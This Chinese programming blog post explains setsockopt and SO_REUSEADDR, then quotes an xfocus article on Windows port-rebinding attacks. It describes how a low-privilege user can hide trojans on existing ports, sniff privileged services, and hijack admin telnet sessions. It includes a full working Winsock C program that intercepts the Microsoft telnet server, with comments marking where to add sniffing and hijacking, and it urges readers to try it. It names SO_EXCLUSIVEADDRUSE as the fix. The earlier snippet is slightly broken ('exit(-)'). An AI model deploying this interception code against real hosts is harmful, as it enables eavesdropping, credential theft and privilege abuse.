学步园

       int setsockopt(int s, int level, int optname, const void *optval,
       socklen_t optlen);

s: 套接字，指向一个打开的套接口描述字
level:级别，指定选项代码的类型。具体类型如下：
   SOL_SOCKET: 基本套接口
   IPPROTO_IP: IPv4套接口
   IPPROTO_IPV6: IPv6套接口
   IPPROTO_TCP: TCP套接口
optname：选项名，选项名称
optval: 选项值，是一个指向变量的指针类型
optlen ：选项长度，即 optval 的大小
返回值：如果函数执行成功，返回0；如果函数执行失败，返回-1。

因此，可以按照下面的伪代码来实现：

int sockfd;
int cflag;

sockfd =socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sockfd < 0)
{
   printf("socket() error/n");
   exit(-);
}
cflag = 1;
if(setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR,
    (char *)&cflag,sizeof(cflag)) == -1)
{
   printf("setsockopt() error/n");
   exit(-);  
}

上 面的代码演示了如何解决地址重复绑定的错误。但这段代码也无疑曝露了一个严重的安全问题，也就端口劫持。因为很有可能出现这种情况：一个程序正在正常地进 行通信，而一个含有恶意的程序利用这项功能，重新绑定了这个端口和地址，进行数据的窃取和篡改。当然在RedHat Linux 9.0 上没有发现有这个漏洞。但是在Windows中却不是这么回事。

下面是从安全焦点(http://www.xfocus.net)网站中FLASHSKY(flashsky1@sina.com)的文章中节选的一段，说得非常好，还且还有例程。因此，照抄过来，和网络爱好者们一起分享。
-------------------------------------------------
因为在winsock的实现中，对于服务器的绑定是可以多重绑定的，在确定多重绑定使用谁的时候，根据一条原则是谁的指定最明确则将包递交给谁，而且没有权限之分，也就是说低级权限的用户是可以重绑定在高级权限的用户使用端口。例如绑定某个服务的端口上。
    这意味着什么呢？意味着可以进行如下的攻击：
    1. 一个木马绑定到一个已经合法存在的端口上进行端口的隐藏，他通过自己特定的包格式判断是不是自己的包。如果是自己的数据包则自己进行处理，如果不是通过127.0.0.1的地址交给真正的服务器应用进行处理。
    2. 一个木马可以在低权限用户上绑定高权限的服务应用的端口，进行该处理信息的嗅探，本来在一个主机上监听一个SOCKET的通讯需要具备非常高的权限要求， 但其实利用SOCKET重绑定，你可以轻易的监听具备这种SOCKET编程漏洞的通讯，而无须采用什么挂接、钩子或低层的驱动技术。
    3. 针对一些的特殊应用，可以发起中间人攻击，从低权限用户上获得信息或事实欺骗，如在guest权限下拦截telnet服务器的23端口，如果是采用 NTLM加密认证，虽然你无法通过嗅探直接获取密码，但一旦有admin用户通过你登陆以后，你的应用就完全可以发起中间人攻击，扮演这个登陆的用户通过 SOCKET发送高权限的命令，到达入侵的目的。
    4. 对于构建的WEB服务器，入侵者只需要获得低级的权限，就可以完全达到更改网页目的。很简单，扮演你的服务器给予连接请求以其他信息的应答，甚至是基于电子商务上的欺骗，获取非法的数据。

其 实，Microsoft 自己的很多服务的SOCKET编程都存在这样的问题，telnet,ftp,http的服务实现全部都可以利用这种方法进行攻击，在低权限用户上实现对 SYSTEM应用的截听。包括W2K+SP3的IIS也都一样，那么如果你已经可以以低权限用户入侵或木马植入的话，而且对方又开启了这些服务的话，那就 不妨一试。并且我估计还有很多第三方的服务也大多存在这个漏洞。
    解决的方法很简单，在编写如上应用的时候，绑定前需要使用setsockopt指定SO_EXCLUSIVEADDRUSE要求独占所有的端口地址，而不允许复用。这样其他人就无法复用这个端口了。
    下面就是一个简单的截听Microsoft telnet服务器的例子，在GUEST用户下都能成功进行截听，剩余的就是大家根据自己的需要，进行一些特殊剪裁的问题了：如是隐藏，嗅探数据，高权限用户欺骗等。

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

DWORD WINAPI ClientThread(LPVOID lpParam);

int main()
{
    WORD wVersionRequested;
    DWORD ret;
    WSADATA wsaData;
    BOOL val;
    SOCKADDR_IN saddr;
    SOCKADDR_IN scaddr;
    int err;
    SOCKET s;
    SOCKET sc;
    int caddsize;
    HANDLE mt;
    DWORD tid;

    wVersionRequested = MAKEWORD( 2, 2 );
    err = WSAStartup( wVersionRequested, &wsaData );
    if ( err != 0 ) {
        printf("error!WSAStartup failed!/n");
        return -1;
    }
    saddr.sin_family = AF_INET;

    //截听虽然也可以将地址指定为INADDR_ANY，但是要不能影响正常应用情况下，应该指定具体的IP，留下127.0.0.1给正常的服务应用，然后利用这个地址进行转发，就可以不影响对方正常应用了
    saddr.sin_addr.s_addr = inet_addr("192.168.0.60");    
    saddr.sin_port = htons(23);
    if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
    {
        printf("error!socket failed!/n");
        return -1;
    }
    val = TRUE;
    //SO_REUSEADDR选项就是可以实现端口重绑定的
    if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val))!=0)
    {
        printf("error!setsockopt failed!/n");
        return -1;
    }
    //如果指定了SO_EXCLUSIVEADDRUSE，就不会绑定成功，返回无权限的错误代码；
    //如果是想通过重利用端口达到隐藏的目的，就可以动态的测试当前已绑定的端口哪个可以成功，就说明具备这个漏洞，然后动态利用端口使得更隐蔽
    //其实UDP端口一样可以这样重绑定利用，这儿主要是以TELNET服务为例子进行攻击
    if(bind(s,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR)
    {
        ret=GetLastError();
        printf("error!bind failed!/n");
        return -1;
    }
    listen(s,2);   
    while(1)
    {
        caddsize = sizeof(scaddr);
        //接受连接请求
        sc = accept(s,(struct sockaddr *)&scaddr,&caddsize);
        if(sc!=INVALID_SOCKET)
        {
            mt = CreateThread(NULL,0,ClientThread,(LPVOID)sc,0,&tid);
            if(mt==NULL)
            {
                printf("Thread Creat Failed!/n");
                break;
            }
        }
        CloseHandle(mt);
    }
    closesocket(s);
    WSACleanup();
    return 0;
}

DWORD WINAPI ClientThread(LPVOID lpParam)
{
    SOCKET ss = (SOCKET)lpParam;
    SOCKET sc;
    unsigned char buf[4096];
    SOCKADDR_IN saddr;
    long num;
    DWORD val;
    DWORD ret;
    //如果是隐藏端口应用的话，可以在此处加一些判断
    //如果是自己的包，就可以进行一些特殊处理，不是的话通过127.0.0.1进行转发

    saddr.sin_family = AF_INET;
    saddr.sin_addr.s_addr = inet_addr("127.0.0.1");
    saddr.sin_port = htons(23);
    if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
    {
        printf("error!socket failed!/n");
        return -1;
    }
    val = 100;
    if(setsockopt(sc,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
    {
        ret = GetLastError();
        return -1;
    }
    if(setsockopt(ss,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
    {
        ret = GetLastError();
        return -1;
    }
    if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))!=0)
    {
        printf("error!socket connect failed!/n");
        closesocket(sc);
        closesocket(ss);
        return -1;
    }
    while(1)
    {
        //下面的代码主要是实现通过127。0。0。1这个地址把包转发到真正的应用上，并把应答的包再转发回去。
        //如果是嗅探内容的话，可以再此处进行内容分析和记录
        //如果是攻击如TELNET服务器，利用其高权限登陆用户的话，可以分析其登陆用户，然后利用发送特定的包以劫持的用户身份执行。
        num = recv(ss,buf,4096,0);
        if(num>0)
            send(sc,buf,num,0);
        else if(num==0)
            break;
        num = recv(sc,buf,4096,0);
        if(num>0)
            send(ss,buf,num,0);
        else if(num==0)
            break;
    }
    closesocket(ss);
    closesocket(sc);
    return 0 ;
}